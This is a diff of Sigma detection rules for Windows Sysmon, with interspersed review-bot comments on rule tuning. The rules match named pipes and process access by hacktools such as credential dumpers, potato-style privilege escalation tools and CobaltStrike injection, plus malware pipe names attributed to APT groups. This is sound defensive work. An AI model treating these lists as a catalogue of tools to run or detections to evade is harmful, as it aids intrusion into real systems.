b/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml 
@@ -1,8 +1,7 @@ title: HackTool - DiagTrackEoP Default Named Pipe id: 1f7025a6-e747-4130-aac4-961eb47015f1 status: experimental -description: Detects creation of default named pipe used by the DiagTrackEoP POC, - a tool that abuses "SeImpersonate" privilege. +description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege. references: - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22 author: Nasreddine Bencherchali (Nextron Systems) @@ -14,12 +13,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: 
@@ -27,7 +21,7 @@ detection: - 18 Channel: Microsoft-Windows-Sysmon/Operational selection: - PipeName|contains: thisispipe + PipeName|contains: thisispipe # Based on source code condition: pipe_created and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml index a1acbeff9..60de51836 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_efspotato.yml @@ -16,12 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: 
@@ -31,13 +26,13 @@ detection:
selection:
PipeName|contains:
- \pipe\
- - \pipe\srvsvc
+ - \pipe\srvsvc # more specific version (use only this one if the other causes too many false positives)
filter_optional_ctx:
PipeName|contains: \CtxShare
filter_optional_default:
- PipeName|startswith: \pipe\
+ PipeName|startswith: \pipe\ # excludes pipes that start with \pipe\*
condition: pipe_created and (selection and not 1 of filter_optional_*)
falsepositives:
- - \pipe\LOCAL\Monitorian
+ - \pipe\LOCAL\Monitorian # https://github.com/emoacht/Monitorian
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml
index 2ea23f44d..a57317ea5 100644
--- a/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml
+++ b/sigma/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml
@@ -1,8 +1,7 @@
title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
-description: Detects well-known credential dumping tools execution via specific named
- pipe creation
+description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
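Review bot: The `falsepositives` entry in the EFSPotato hunk is still a raw pipe name, `\pipe\LOCAL\Monitorian`, where the field is meant to hold a short description of the benign activity; the new URL comment helps a human reader but is discarded by anything that parses the YAML. A prose entry such as `- Monitorian (https://github.com/emoacht/Monitorian) creates the pipe \pipe\LOCAL\Monitorian` keeps the attribution in the data itself. Separately, `\pipe\srvsvc` in the `contains` list is fully covered by the `\pipe\` entry above it, as the new comment acknowledges, so it only changes behaviour once `\pipe\` is removed; stating that explicitly in the comment, e.g. `# redundant while \pipe\ is listed; keep only this entry if \pipe\ is too noisy`, would make the tuning intent clearer.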
@@ -19,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml index 55e631a48..d674ff91e 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml 
@@ -16,12 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml index 79e30f097..076f2106c 100644 --- a/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml 
@@ -1,11 +1,10 @@ title: Alternate PowerShell Hosts Pipe id: 58cb02d5-78ce-4692-b3e1-dce850aae41a related: - - id: ac7102b4-9e1e-4802-9b4f-17c5524c015c - type: derived + - id: ac7102b4-9e1e-4802-9b4f-17c5524c015c + type: derived status: test -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html @@ -19,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: 
@@ -35,10 +29,10 @@ detection: PipeName|startswith: \PSHost filter_main_generic: Image|contains: - - :\Program Files\PowerShell\7-preview\pwsh.exe - - :\Program Files\PowerShell\7\pwsh.exe + - :\Program Files\PowerShell\7-preview\pwsh.exe # Powershell 7 + - :\Program Files\PowerShell\7\pwsh.exe # Powershell 7 - :\Windows\system32\dsac.exe - - :\Windows\system32\inetsrv\w3wp.exe + - :\Windows\system32\inetsrv\w3wp.exe # this is sad :,( but it triggers FPs on Exchange servers - :\Windows\System32\sdiagnhost.exe - :\Windows\system32\ServerManager.exe - :\Windows\system32\wbem\wmiprvse.exe @@ -47,7 +41,7 @@ detection: - :\Windows\System32\wsmprovhost.exe - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - filter_main_sqlserver: + filter_main_sqlserver: # Microsoft SQL Server\130\Tools\ Image|contains|all: - :\Program Files - \Microsoft SQL Server\ @@ -57,9 +51,8 @@ detection: filter_optional_exchange: Image|contains: :\Program Files\Microsoft\Exchange Server\ filter_main_null: - Image: null - condition: pipe_created and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + Image: + condition: pipe_created and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter. level: medium diff --git a/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml index a2538b49d..9d664d917 100644 --- a/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml 
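Review bot: The new comment on `:\Windows\system32\inetsrv\w3wp.exe` in `filter_main_generic` explains that the exclusion exists for Exchange false positives, but because it sits in a mandatory `filter_main_*` block it also silences `\PSHost` pipes created by the IIS worker process on every non-Exchange IIS host, which is precisely the alternate PowerShell hosting this rule describes. `filter_optional_exchange` (`:\Program Files\Microsoft\Exchange Server\`) does not cover this case because w3wp.exe lives under `inetsrv` regardless of which application pool it serves, which is presumably why the entry ended up in the generic filter. Moving it into its own optional block, `filter_optional_iis_w3wp:` / `Image|contains: :\Windows\system32\inetsrv\w3wp.exe`, keeps the Exchange tuning available while letting operators without Exchange retain the coverage; the existing `condition` already excludes `1 of filter_optional_*`, so no condition change is needed.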
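Review bot: `filter_main_null` now reads `Image:` with an empty value instead of the explicit `Image: null`; both parse to a YAML null and Sigma treats a null value as "field not present", so behaviour is unchanged, but the bare key reads like an unfinished entry and invites a later formatter to rewrite it in either direction. Prefer keeping the explicit form, `Image: null`, which is the spelling the Sigma specification documents for this kind of match. The reflow of the `condition` line in the same hunk is fine.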
@@ -1,11 +1,10 @@ title: New PowerShell Instance Created id: ac7102b4-9e1e-4802-9b4f-17c5524c015c related: - - id: 58cb02d5-78ce-4692-b3e1-dce850aae41a - type: derived + - id: 58cb02d5-78ce-4692-b3e1-dce850aae41a + type: derived status: test -description: Detects the execution of PowerShell via the creation of a named pipe - starting with PSHost +description: Detects the execution of PowerShell via the creation of a named pipe starting with PSHost references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html @@ -19,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: 
diff --git a/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml index dc869c7b1..2d14eff8e 100644 --- a/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml @@ -1,8 +1,8 @@ title: PUA - CSExec Default Named Pipe id: f318b911-ea88-43f4-9281-0de23ede628e related: - - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 - type: obsoletes + - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 + type: obsoletes status: test description: Detects default CSExec pipe creation references: @@ -20,12 +20,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: 
diff --git a/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml index cb2eda2d5..7bf681fbe 100644 --- a/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml @@ -14,12 +14,7 @@ tags: logsource: category: pipe_created product: windows - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml b/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml index ae86db4b0..bd9f93b2d 100644 --- a/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml 
@@ -1,8 +1,8 @@ title: PUA - RemCom Default Named Pipe id: d36f87ea-c403-44d2-aa79-1a0ac7c24456 related: - - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 - type: obsoletes + - id: 9e77ed63-2ecf-4c7b-b09d-640834882028 + type: obsoletes status: test description: Detects default RemCom pipe creation references: @@ -20,12 +20,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml b/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml index 8055e6443..d52138c0b 100644 --- a/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml +++ b/sigma/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml 
@@ -14,12 +14,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml b/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml index cc619c56d..409dd89bf 100644 --- a/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml +++ b/sigma/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml 
@@ -26,12 +26,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: 
@@ -40,33 +35,34 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: PipeName: - - \46a676ab7f179e511e30dd2dc41bd388 - - \583da945-62af-10e8-4902-a8f205c72b2e - - \6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 - - \9f81f59bc58452127884ce513865ed20 - - \adschemerpc - - \ahexec - - \AnonymousPipe - - \bc31a7 - - \bc367 - - \bizkaz - - \csexecsvc - - \dce_3d - - \e710f28d59aa529d6792ca6ff0ca1b34 - - \gruntsvc - - \isapi_dg - - \isapi_dg2 - - \isapi_http - - \jaccdpqnvbrrxlaf - - \lsassw - - \NamePipe_MoreWindows - - \pcheap_reuse - - \Posh* - - \rpchlp_3 - - \sdlrpc - - \svcctl - - \testPipe - - \winsession + - \46a676ab7f179e511e30dd2dc41bd388 # Project Sauron + - \583da945-62af-10e8-4902-a8f205c72b2e # SolarWinds SUNBURST malware + - \6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 # LiquidSnake + - \9f81f59bc58452127884ce513865ed20 # Project Sauron + - \adschemerpc # Turla HyperStack + - \ahexec # Sofacy group malware + - \AnonymousPipe # Hidden Cobra Hoplight + - \bc31a7 # Pacifier + - \bc367 # Pacifier + - \bizkaz # Snatch Ransomware + - \csexecsvc # CSEXEC default + - \dce_3d # Qbot + - \e710f28d59aa529d6792ca6ff0ca1b34 # Project Sauron + - \gruntsvc # Covenant default + - \isapi_dg # Uroburos Malware + - \isapi_dg2 # Uroburos Malware + - \isapi_http # Uroburos Malware + - \jaccdpqnvbrrxlaf # PoshC2 default + - \lsassw # Wild Neutron APT malware + - \NamePipe_MoreWindows # Cloud Hopper - RedLeaves + - \pcheap_reuse # Pipe used by Equation Group malware + - \Posh* # PoshC2 default + - \rpchlp_3 # Project Sauron + - \sdlrpc # Cobra Trojan + - \svcctl # Crackmapexec smbexec default + - \testPipe # Emissary Panda Hyperbro + - \winsession # Wild Neutron APT malware + # - '\status_*' # CS default https://github.com/SigmaHQ/sigma/issues/253 condition: pipe_created and selection falsepositives: - Unknown 
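Review bot: The new attribution comments are useful, but `\svcctl` (now annotated `# Crackmapexec smbexec default`) is also the name of the native Service Control Manager RPC endpoint pipe on every Windows host, so unlike the other entries it does not identify a tool on its own. The rule's `pipe_created` selector is outside this hunk; if it includes Sysmon EventID 18 (pipe connected) as the sibling named-pipe rules in this commit do, every legitimate remote service-management connection will match on this entry alone, which is at odds with `falsepositives: - Unknown`. Consider either moving `\svcctl` to a lower-confidence rule or documenting the expected benign hits, e.g. `- Legitimate remote service management connects to the native SCM pipe \svcctl`, so that tuning is expected rather than surprising. The commented-out `# - '\status_*'` line is harmless but will drift out of sync with the linked issue over time; a one-line note on why it stays disabled would help.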
diff --git a/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml b/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml index 6545f5e1a..9e9963e88 100644 --- a/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml +++ b/sigma/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml @@ -1,12 +1,10 @@ title: PsExec Tool Execution From Suspicious Locations - PipeName id: 41504465-5e3a-4a5b-a5b4-2a0baadd4463 related: - - id: f3f3a972-f982-40ad-b63c-bca6afdfad7c - type: derived + - id: f3f3a972-f982-40ad-b63c-bca6afdfad7c + type: derived status: experimental -description: Detects PsExec default pipe creation where the image executed is located - in a suspicious location. Which could indicate that the tool is being used in - an attack +description: Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet 
@@ -21,12 +19,7 @@ tags: logsource: category: pipe_created product: windows - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -35,7 +28,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: PipeName: \PSEXESVC - Image|contains: + Image|contains: # Add or remove locations depending on how and if you execute Psexec in your env - :\Users\Public\ - :\Windows\Temp\ - \AppData\Local\Temp\ @@ -43,7 +36,6 @@ detection: - \Downloads\ condition: pipe_created and selection falsepositives: - - Rare legitimate use of psexec from the locations mentioned above. This will - require initial tuning based on your environment. + - Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment. level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml b/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml index 77b412519..49a53001a 100644 --- a/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml +++ b/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'echo ' - '%userdomain%' condition: process_creation and selection diff --git a/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml b/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml index 9c2cb9907..63e44e017 100644 --- a/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml +++ b/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Process Access id: 3b4b232a-af90-427c-a22f-30b0c0837b95 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman @@ -21,6 +20,7 @@ logsource: product: windows category: process_access detection: + # Process Access Call Trace process_access: EventID: 10 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml b/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml index a932f1631..8a2efbea6 100644 
--- a/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml +++ b/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml @@ -1,8 +1,7 @@ title: HackTool - CobaltStrike BOF Injection Pattern id: 09706624-b7f6-455d-9d02-adee024cee1d status: test -description: Detects a typical pattern of a CobaltStrike BOF which inject into other - processes +description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes references: - https://github.com/boku7/injectAmsiBypass - https://github.com/boku7/spawn diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml b/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml index 0c7ff6969..47c070ce7 100644 --- a/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml +++ b/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml @@ -1,8 +1,7 @@ title: HackTool - Generic Process Access id: d0d2f720-d14f-448d-8242-51ff396a334e status: experimental -description: Detects process access requests from hacktool processes based on their - default image name +description: Detects process access requests from hacktool processes based on their default image name references: - https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158 - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html 
@@ -21,94 +20,94 @@ detection:
EventID: 10
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - SourceImage|endswith:
- - \Akagi.exe
- - \Akagi64.exe
- - \atexec_windows.exe
- - \Certify.exe
- - \Certipy.exe
- - \CoercedPotato.exe
- - \crackmapexec.exe
- - \CreateMiniDump.exe
- - \dcomexec_windows.exe
- - \dpapi_windows.exe
- - \findDelegation_windows.exe
- - \GetADUsers_windows.exe
- - \GetNPUsers_windows.exe
- - \getPac_windows.exe
